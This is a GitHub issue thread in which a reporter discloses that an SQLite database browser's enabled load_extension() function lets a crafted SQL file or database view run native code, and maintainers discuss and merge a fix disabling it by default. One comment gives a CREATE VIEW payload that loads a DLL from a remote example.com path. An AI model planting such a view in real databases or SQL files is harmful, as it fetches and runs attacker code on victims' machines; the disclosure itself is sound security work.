-
-
Notifications
You must be signed in to change notification settings - Fork 2.1k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Importing a malicious sql file can lead to code execution #1551
Comments
Yes, this is an expected thing. Loading a malicious file into any command interpreter won't be good. Same goes for shell scripts on *nix, batch/command/powershell files on Windows, (etc). That being said... the functionality you're pointing out of grabbing stuff from remote servers... may not be needed. Not sure if removing that one bit will really help though, as it sounds like it'd be a case of whack-a-mole? eg this is just one potential hole, but there would be other ways to achieve the same thing Thoughts? 😄 |
SQL isn't really a command interpreter in the traditional sense though. Most people will think that importing a sql file into sqlitebrowser won't affect anything but the database file. And this isn't too far from truth since SQL can (usually) be safely executed because code execution is only possible using |
Hmm, yeah. Reading through that bit of the docs we might be able to do something along the lines of disabling it after the session has started. So when the database is loaded, any extensions explicitly indicated in our Preferences dialog are loaded, then we call Something like this might do it:
@MKleusberg @mgrojo What do you reckon? |
Did some testing and it seems that this can also be exploited by loading a normal database file. Simply create a view like this: CREATE VIEW testview AS SELECT load_extension("\\example.com\sqlite_extension.dll", "hello"); When loading this database file and then clicking on |
Heh heh heh, that's clever. 😄 |
While you're exploring things, maybe see if It looks like it opens files in immutable mode, so I have a feeling it's probably not taking care to disable extension loading either (!). |
We're calling In the documentation it is recommended to call I tried making that change but An alternative fix would be to disable the option after having loaded our extensions. That would work with any version. The documentation is unclear about whether that option is stored in the database. In that case it would make sense to restore the previous value, but then, it is also unclear if that function returns the previous value. I'll made some tests. |
This seems to be an option of the connection and it is not saved in the database file. I have a working version which calls |
Using sqlite3_enable_load_extension not only allows loading extensions through the C-API but also through the SQL functioon load_extension(). That might be a security risk if the user is unaware that executing an SQL file can lead to native code execution and not only to database file modification. See issue #1551
Using sqlite3_enable_load_extension not only allows loading extensions through the C-API but also through the SQL functioon load_extension(). That might be a security risk if the user is unaware that executing an SQL file can lead to native code execution and not only to database file modification. See issue #1551
…1558) * Leaving the loading of extensions enabled might be a security risk Using sqlite3_enable_load_extension not only allows loading extensions through the C-API but also through the SQL functioon load_extension(). That might be a security risk if the user is unaware that executing an SQL file can lead to native code execution and not only to database file modification. See issue #1551 * Preference for allowing loading extensions from SQL code New setting that authorizes the execution of load_extension() from SQL code. Default value, false, following the design decision of SQLite, that disables this function unless by default. Added notice about the option in the calltips of the two function variants.
…1558) * Leaving the loading of extensions enabled might be a security risk Using sqlite3_enable_load_extension not only allows loading extensions through the C-API but also through the SQL functioon load_extension(). That might be a security risk if the user is unaware that executing an SQL file can lead to native code execution and not only to database file modification. See issue #1551 * Preference for allowing loading extensions from SQL code New setting that authorizes the execution of load_extension() from SQL code. Default value, false, following the design decision of SQLite, that disables this function unless by default. Added notice about the option in the calltips of the two function variants.
@Pyriphlegethon We've added an option for enabling the |
@mgrojo Pretty sure it missed getting into the alpha1 release, as the patch merge was done about 6 hours ago and I generated the binaries a few hours before that. The patch will be in the next alpha or beta release though, which we might be able to do fairly soon (both builds are now scripted, so it's just button pressing to create them). 😁 |
Oops, sorry. I missed the order of events. |
@Pyriphlegethon Any interest in trying our recent beta release? https://github.com/sqlitebrowser/sqlitebrowser/releases/tag/v3.11.0-beta1 That includes the patch for this created by @mgrojo. Testing from your point of view would be really useful. 😄 |
Seems good. |
Excellent. Good stuff @Pyriphlegethon & @mgrojo. 😄 |
When importing a sql file the
load_extension
function is enabled. An attacker can craft a malicious sql file like this:On a Windows machine this sql file will download
sqlite_extension.dll
fromexample.com
and then execute the functionhello
.The text was updated successfully, but these errors were encountered: